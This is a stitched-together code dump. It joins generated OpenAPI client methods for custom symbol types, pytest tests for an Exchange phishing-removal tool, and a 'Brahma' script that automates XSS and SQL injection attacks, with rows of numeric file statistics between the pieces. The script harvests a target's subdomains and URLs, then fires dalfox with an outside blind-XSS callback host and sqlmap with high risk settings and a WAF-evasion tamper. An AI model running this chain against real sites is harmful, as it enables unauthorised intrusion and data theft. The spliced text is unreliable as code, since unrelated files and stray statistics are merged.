def get_symbol_custom_fields_for_custom_symbol_type_async(
self,
custom_symbol_type_id,
**kwargs
) -> "ApplyResult[[CustomSymbolCustomFieldConfigDto]]":
"""Get Custom fields for Custom Symbol type # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
custom_symbol_type_id (str): customSymbolTypeId to get associated Custom fileds
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[[CustomSymbolCustomFieldConfigDto]]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.get_symbol_custom_fields_for_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def get_symbol_custom_fields_for_custom_symbol_type_with_http_info_async(
self,
custom_symbol_type_id,
**kwargs
) -> "ApplyResult[typing.Tuple[[CustomSymbolCustomFieldConfigDto], int, typing.MutableMapping]]":
"""Get Custom fields for Custom Symbol type # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Args:
custom_symbol_type_id (str): customSymbolTypeId to get associated Custom fileds
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[([CustomSymbolCustomFieldConfigDto], int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.get_symbol_custom_fields_for_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def update_custom_symbol_type(
self,
custom_symbol_type_id,
**kwargs
) -> None:
"""Edit a Custom symbol type # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
custom_symbol_type_id (str): customSymbolTypeId to update associated record
Keyword Args:
update_custom_symbol_type_dto (UpdateCustomSymbolTypeDto): updateCustomSymbolTypeDto object to update. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
None
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.update_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def update_custom_symbol_type_with_http_info(
self,
custom_symbol_type_id,
**kwargs
) -> typing.Tuple[None, int, typing.MutableMapping]:
"""Edit a Custom symbol type # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
custom_symbol_type_id (str): customSymbolTypeId to update associated record
Keyword Args:
update_custom_symbol_type_dto (UpdateCustomSymbolTypeDto): updateCustomSymbolTypeDto object to update. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
None
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.update_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def update_custom_symbol_type_async(
self,
custom_symbol_type_id,
**kwargs
) -> "ApplyResult[None]":
"""Edit a Custom symbol type # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
custom_symbol_type_id (str): customSymbolTypeId to update associated record
Keyword Args:
update_custom_symbol_type_dto (UpdateCustomSymbolTypeDto): updateCustomSymbolTypeDto object to update. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[None]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.update_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def update_custom_symbol_type_with_http_info_async(
self,
custom_symbol_type_id,
**kwargs
) -> "ApplyResult[typing.Tuple[None, int, typing.MutableMapping]]":
"""Edit a Custom symbol type # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Args:
custom_symbol_type_id (str): customSymbolTypeId to update associated record
Keyword Args:
update_custom_symbol_type_dto (UpdateCustomSymbolTypeDto): updateCustomSymbolTypeDto object to update. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(None, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.update_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def update_custom_symbol_type_order(
self,
**kwargs
) -> None:
"""update_custom_symbol_type_order # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Keyword Args:
reorder_custom_symbol_type_dto (ReorderCustomSymbolTypeDto): [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
None
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
return self.update_custom_symbol_type_order_endpoint.call_with_http_info(**kwargs)
def update_custom_symbol_type_order_with_http_info(
self,
**kwargs
) -> typing.Tuple[None, int, typing.MutableMapping]:
"""update_custom_symbol_type_order # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Keyword Args:
reorder_custom_symbol_type_dto (ReorderCustomSymbolTypeDto): [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
None
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
return self.update_custom_symbol_type_order_endpoint.call_with_http_info(**kwargs)
def update_custom_symbol_type_order_async(
self,
**kwargs
) -> "ApplyResult[None]":
"""update_custom_symbol_type_order # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Keyword Args:
reorder_custom_symbol_type_dto (ReorderCustomSymbolTypeDto): [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[None]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
return self.update_custom_symbol_type_order_endpoint.call_with_http_info(**kwargs)
def update_custom_symbol_type_order_with_http_info_async(
self,
**kwargs
) -> "ApplyResult[typing.Tuple[None, int, typing.MutableMapping]]":
"""update_custom_symbol_type_order # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Keyword Args:
reorder_custom_symbol_type_dto (ReorderCustomSymbolTypeDto): [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(None, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
return self.update_custom_symbol_type_order_endpoint.call_with_http_info(**kwargs)
| 45.485048
| 125
| 0.588855
| 8,477
| 76,051
| 5.087531
| 0.027014
| 0.060102
| 0.071973
| 0.035059
| 0.962715
| 0.95075
| 0.944791
| 0.942356
| 0.935864
| 0.9274
| 0
| 0.003326
| 0.351567
| 76,051
| 1,671
| 126
| 45.512268
| 0.871213
| 0.57589
| 0
| 0.679749
| 1
| 0
| 0.17603
| 0.094255
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047096
| false
| 0
| 0.023548
| 0
| 0.11617
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bc7cef5e47c4ef3b36b8c1a5a35e958897c1bda8
| 13,085
|
py
|
Python
|
tests/saq/test_phishfry.py
|
ace-ecosystem/ACE
|
d17b5ef4bccf923ec6be5115fabe40f0627dab2d
|
[
"Apache-2.0"
] | 24
|
2019-09-21T21:09:45.000Z
|
2022-03-15T19:48:13.000Z
|
tests/saq/test_phishfry.py
|
ace-ecosystem/ACE
|
d17b5ef4bccf923ec6be5115fabe40f0627dab2d
|
[
"Apache-2.0"
] | 54
|
2019-09-16T20:06:30.000Z
|
2021-08-18T22:22:08.000Z
|
tests/saq/test_phishfry.py
|
ace-ecosystem/ACE
|
d17b5ef4bccf923ec6be5115fabe40f0627dab2d
|
[
"Apache-2.0"
] | 9
|
2019-09-08T13:35:55.000Z
|
2021-01-03T15:23:37.000Z
|
import pytest
import json
from saq.phishfry import *
from tests.saq.requests import MockAuth, mock_site, mock_proxies
@pytest.mark.parametrize('address, mailbox_address, mailbox_type, site_map', [
('jdoe@company.com', 'jdoe@company.com', 'Mailbox', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_mailbox_request.xml',
'response_file': 'find_mailbox_response.xml',
},
]),
])
@pytest.mark.integration
def test_find_mailbox(datadir, requests_mock, address, mailbox_address, mailbox_type, site_map):
mock_site(requests_mock, datadir, site_map)
phishfry = Phishfry('server', 'Exchange2010_SP2')
mailbox = phishfry.find_mailbox(address)
assert mailbox.email_address == mailbox_address
assert mailbox.mailbox_type == mailbox_type
@pytest.mark.parametrize('address, exception, message, site_map', [
('jdoe@company.com', ErrorUnsupportedMailboxType, 'unsupported mailbox type: GroupMailbox', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_mailbox_request.xml',
'response_file': 'find_mailbox_response_group.xml',
},
]),
('jdoe@company.com', ErrorUnsupportedMailboxType, 'unsupported mailbox type: PublicDL', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_mailbox_request.xml',
'response_file': 'find_mailbox_response_public_dl.xml',
},
]),
('jdoe@company.com', ErrorNonExistentMailbox, 'mailbox does not exist', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_mailbox_request.xml',
'response_file': 'find_mailbox_response_no_results.xml',
},
]),
('jdoe@company.com', Exception, 'failed to find mailbox: ErrorUnknown', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_mailbox_request.xml',
'response_file': 'find_mailbox_response_error.xml',
},
]),
('jdoe@company.com', requests.exceptions.HTTPError, 'Server Error', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 500,
'request_file': 'find_mailbox_request.xml',
'response_file': 'find_mailbox_response_error.xml',
},
]),
('jdoe@company.com', Exception, 'ResponseCode not found', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_mailbox_request.xml',
'response_text': 'no response',
},
]),
])
@pytest.mark.integration
def test_find_mailbox_error(datadir, requests_mock, address, exception, message, site_map):
mock_site(requests_mock, datadir, site_map)
phishfry = Phishfry('server', 'Exchange2010_SP2')
with pytest.raises(exception) as e:
phishfry.find_mailbox(address)
assert message in str(e)
@pytest.mark.parametrize('site_map', [
([
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_folder_request.xml',
'response_file': 'find_folder_response.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
])
@pytest.mark.integration
def test_find_folder(datadir, requests_mock, site_map):
mock_site(requests_mock, datadir, site_map)
phishfry = Phishfry('server', 'Exchange2010_SP2')
mailbox = Mailbox('jdoe@company.com', 'Mailbox')
folder = phishfry.find_folder(mailbox, 'AllItems')
assert folder.folder_id == 'TestId'
@pytest.mark.parametrize('exception, message, site_map', [
(ErrorNonExistentMessage, 'message does not exist', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_folder_request.xml',
'response_file': 'find_folder_response_no_results.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
(ErrorNonExistentMailbox, 'mailbox does not exist', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_folder_request.xml',
'response_file': 'find_folder_response_no_mailbox.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
(Exception, 'failed to find folder: ErrorUnknown', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_folder_request.xml',
'response_file': 'find_folder_response_error.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
(requests.exceptions.HTTPError, 'Server Error', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 500,
'request_file': 'find_folder_request.xml',
'response_file': 'find_folder_response_error.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
])
@pytest.mark.integration
def test_find_folder_error(datadir, requests_mock, exception, message, site_map):
mock_site(requests_mock, datadir, site_map)
phishfry = Phishfry('server', 'Exchange2010_SP2')
mailbox = Mailbox('jdoe@company.com', 'Mailbox')
with pytest.raises(exception) as e:
phishfry.find_folder(mailbox, 'AllItems')
assert message in str(e)
@pytest.mark.parametrize('site_map', [
([
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_item_request.xml',
'response_file': 'find_item_response.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
])
@pytest.mark.integration
def test_find_item(datadir, requests_mock, site_map):
mock_site(requests_mock, datadir, site_map)
phishfry = Phishfry('server', 'Exchange2010_SP2')
mailbox = Mailbox('jdoe@company.com', 'Mailbox')
folder = Folder(mailbox, 'TestId')
item = phishfry.find_item(folder, '<test>')
assert item.item_id == 'item_id'
@pytest.mark.parametrize('exception, message, site_map', [
(ErrorNonExistentMessage, 'message does not exist', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_item_request.xml',
'response_file': 'find_item_response_no_results.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
(Exception, 'failed to find item: ErrorUnknown', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_item_request.xml',
'response_file': 'find_item_response_error.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
(requests.exceptions.HTTPError, 'Server Error', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 500,
'request_file': 'find_item_request.xml',
'response_file': 'find_item_response_error.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
])
@pytest.mark.integration
def test_find_item_error(datadir, requests_mock, exception, message, site_map):
mock_site(requests_mock, datadir, site_map)
phishfry = Phishfry('server', 'Exchange2010_SP2')
mailbox = Mailbox('jdoe@company.com', 'Mailbox')
folder = Folder(mailbox, 'TestId')
with pytest.raises(exception) as e:
phishfry.find_item(folder, '<test>')
assert message in str(e)
@pytest.mark.parametrize('site_map', [
([
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'remove_request.xml',
'response_file': 'remove_response.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
])
@pytest.mark.integration
def test_delete(datadir, requests_mock, site_map):
mock_site(requests_mock, datadir, site_map)
phishfry = Phishfry('server', 'Exchange2010_SP2')
mailbox = Mailbox('jdoe@company.com', 'Mailbox')
folder = Folder(mailbox, 'folder_id')
item = Item(folder, 'item_id')
phishfry.delete(item, 'SoftDelete')
@pytest.mark.parametrize('exception, message, site_map', [
(Exception, 'failed to remove item: ErrorUnknown', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'remove_request.xml',
'response_file': 'remove_response_error.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
(requests.exceptions.HTTPError, 'Server Error', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 500,
'request_file': 'remove_request.xml',
'response_file': 'remove_response_error.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
(ErrorNonExistentMessage, 'message does not exist', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'remove_request.xml',
'response_file': 'remove_response_not_found.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
])
@pytest.mark.integration
def test_delete_error(datadir, requests_mock, exception, message, site_map):
mock_site(requests_mock, datadir, site_map)
phishfry = Phishfry('server', 'Exchange2010_SP2')
mailbox = Mailbox('jdoe@company.com', 'Mailbox')
folder = Folder(mailbox, 'folder_id')
item = Item(folder, 'item_id')
with pytest.raises(exception) as e:
phishfry.delete(item, 'SoftDelete')
assert message in str(e)
@pytest.mark.parametrize('site_map', [
([
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'restore_request.xml',
'response_file': 'restore_response.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
])
@pytest.mark.integration
def test_move(datadir, requests_mock, site_map):
mock_site(requests_mock, datadir, site_map)
phishfry = Phishfry('server', 'Exchange2010_SP2')
mailbox = Mailbox('jdoe@company.com', 'Mailbox')
folder = Folder(mailbox, 'folder_id')
item = Item(folder, 'item_id')
phishfry.move(item, 'inbox')
@pytest.mark.parametrize('exception, message, site_map', [
(ErrorNonExistentMessage, 'message does not exist', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'restore_request.xml',
'response_file': 'restore_response_not_found.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
(Exception, 'failed to restore item: ErrorUnknown', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'restore_request.xml',
'response_file': 'restore_response_error.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
(requests.exceptions.HTTPError, 'Server Error', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 500,
'request_file': 'restore_request.xml',
'response_file': 'restore_response_error.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
])
@pytest.mark.integration
def test_move_error(datadir, requests_mock, exception, message, site_map):
mock_site(requests_mock, datadir, site_map)
phishfry = Phishfry('server', 'Exchange2010_SP2')
mailbox = Mailbox('jdoe@company.com', 'Mailbox')
folder = Folder(mailbox, 'folder_id')
item = Item(folder, 'item_id')
with pytest.raises(exception) as e:
phishfry.move(item, 'inbox')
assert message in str(e)
| 37.385714
| 97
| 0.592052
| 1,347
| 13,085
| 5.533779
| 0.067558
| 0.048699
| 0.06198
| 0.057955
| 0.931446
| 0.914274
| 0.900054
| 0.852562
| 0.836464
| 0.836464
| 0
| 0.012504
| 0.254337
| 13,085
| 349
| 98
| 37.492837
| 0.75146
| 0
| 0
| 0.705015
| 0
| 0
| 0.393275
| 0.075048
| 0
| 0
| 0
| 0
| 0.026549
| 1
| 0.029499
| false
| 0
| 0.011799
| 0
| 0.041298
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bca2943ce5552fca2727b52e26b1f716b5d18d24
| 13,300
|
py
|
Python
|
Brahma/core/automator.py
|
DevanshRaghav75/Brahma
|
fe54a96bd968c7a0f44285ae6ed35fcfc8101816
|
[
"MIT"
] | 5
|
2021-07-12T05:08:35.000Z
|
2022-03-25T01:16:30.000Z
|
Brahma/core/automator.py
|
DevanshRaghav75/Brahma
|
fe54a96bd968c7a0f44285ae6ed35fcfc8101816
|
[
"MIT"
] | null | null | null |
Brahma/core/automator.py
|
DevanshRaghav75/Brahma
|
fe54a96bd968c7a0f44285ae6ed35fcfc8101816
|
[
"MIT"
] | null | null | null |
import time
import os
import re
from Brahma.core.args import target
from Brahma.core.colors import RED, WHITE, GREEN, CYAN, YELLOW
from Brahma.core.styles import RESET, BRIGHT
from os import path
def xss():
print(BRIGHT + GREEN + "[*] " + RESET + "XSS will be automated using: gf, gf_patterns, waybackurls, subfinder, dalfox, httpx")
time.sleep(2)
print(BRIGHT + GREEN + "[*] " + RESET + "Finding subdomains using subfinder" )
print(BRIGHT + GREEN + "[*] " + RESET + "Making results directory")
os.system("mkdir results")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: subfinder -d " + target + " | tee results/domains.txt ")
time.sleep(3)
if re.search('https://', target):
url = target.replace('https://', '')
else:
url = target.replace('http://', '')
os.system("subfinder -d " + url + " | tee results/domains.txt")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding working domains from results/domains.txt")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: cat results/domains.txt | httpx | tee results/urls.alive")
time.sleep(3)
os.system("cat results/domains.txt | httpx | tee results/urls.alive")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding urls using waybackurls")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: cat results/urls.alive | waybackurls | tee results/urls.final")
time.sleep(3)
os.system("cat results/urls.alive | waybackurls | tee results/urls.final")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding XSS urls using gf and gf_patterns")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: gf xss results/urls.final >> results/urls.xss")
time.sleep(3)
os.system("gf xss results/urls.final >> results/urls.xss")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding XSS using dalfox")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: dalfox -b hahwul.xss.ht file results/urls.xss")
time.sleep(3)
os.system("dalfox -b hahwul.xss.ht file results/urls.xss")
print(BRIGHT + YELLOW + "[DONE] " + RESET + "All tasks done!")
def sqli():
print(BRIGHT + GREEN + "[*] " + RESET + "SQLI will be automated using: gf, gf_patterns, waybackurls, subfinder, httpx, sqlmap")
time.sleep(2)
print(BRIGHT + GREEN + "[*] " + RESET + "Finding subdomains using subfinder" )
print(BRIGHT + GREEN + "[*] " + RESET + "Making results directory")
os.system("mkdir results")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: subfinder -d " + target + " | tee results/domains.txt ")
time.sleep(3)
if re.search('https://', target):
url = target.replace('https://', '')
else:
url = target.replace('http://', '')
os.system("subfinder -d " + url + " | tee results/domains.txt")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding working domains from results/domains.txt")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: cat results/domains.txt | httpx | tee results/urls.alive")
time.sleep(3)
os.system("cat results/domains.txt | httpx | tee results/urls.alive")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding urls using waybackurls")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: cat results/urls.alive | waybackurls | tee results/urls.final")
time.sleep(3)
os.system("cat results/urls.alive | waybackurls | tee results/urls.final")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding sqli urls using gf and gf_patterns")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: gf sqli results/urls.final >> results/urls.sqli")
time.sleep(3)
os.system("gf sqli results/urls.final >> results/urls.sqli")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding sqli using sqlmap")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: sqlmap -m results/urls.sqli --dbs --batch --random-agent --level 5 --risk 3 --tamper=between")
time.sleep(3)
os.system("sqlmap -m results/urls.sqli --dbs --batch --random-agent --level 5 --risk 3 --tamper=between")
print(BRIGHT + YELLOW + "[DONE] " + RESET + "All tasks done!")
